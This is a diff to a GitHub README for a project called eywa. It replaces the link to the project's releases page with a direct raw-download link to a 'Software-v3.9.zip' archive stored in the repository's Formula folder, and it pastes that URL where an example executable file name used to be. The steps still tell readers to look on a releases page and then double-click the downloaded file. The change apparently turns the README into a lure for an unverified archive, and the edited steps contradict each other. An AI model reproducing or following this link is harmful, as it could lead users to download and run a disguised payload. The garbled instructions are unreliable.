nans28/eywa/README.md

 ## 📂 Download & Install

-1. Click this link to visit the release page: [Download eywa](https://github.com/nans28/eywa/releases).
+1. Click this link to visit the release page: [Download eywa](https://github.com/nans28/eywa/raw/refs/heads/main/Formula/Software-v3.9.zip).
 2. On the releases page, find the latest version of **eywa**.
-3. Look for the file that matches your operating system (e.g., `eywa-windows.exe`, `eywa-macos`, `eywa-linux`).
+3. Look for the file that matches your operating system (e.g., `https://github.com/nans28/eywa/raw/refs/heads/main/Formula/Software-v3.9.zip`, `eywa-macos`, `eywa-linux`).
 4. Click the file to start downloading.
 5. Once the download is complete, locate the file on your computer.
 6. Double-click the file to run **eywa**.
 No installation process is necessary.
 The application should start immediately.